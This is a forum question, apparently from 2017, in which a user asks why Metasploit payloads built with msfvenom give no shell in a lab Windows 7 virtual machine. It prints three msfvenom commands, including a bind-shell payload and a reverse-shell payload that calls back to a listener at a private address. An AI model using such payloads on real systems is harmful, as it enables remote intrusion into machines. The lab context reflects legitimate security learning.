AnsweredAssumed Answered

Windows Payload issues

Question asked by Keith Rozario on Apr 3, 2017

I've having some problems with my payloads.

 

I used msfvenom to generate the following payloads:

  1. msfvenom -a x86 -p windows/exec CMD=calc.exe -f exe > testcalc-windows-exec.exe
  2. msfvenom -p windows/shell/bind_tcp -f exe > windows-bind-tcp-4444.exe
  3. msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.187 LPORT=4000 -f exe > test-win-shell-reverse.exe

 

I place all 3 exe files into a windows 7 (unpatched) virtual machine--with no AV or Firewall.

 

(1) works perfectly fine, and calc.exe launches. Good.

 

(2) creates an open port, but when I login I don't get a shell (am I missing a parameter to bind to cmd or shell?) BAD.

 

(3) The 'attacked' computer calls back the attacking computer on 192.168.0.187, (i.e. I can see something connect to my listening ncat port, but nothing else). I can't seem to get a reverse shell---just a reverse connect, and nothing else. BAD.

 

am I missing something in (2) and (3), I want to run native shells first before proceeding to metepreter etc.

Outcomes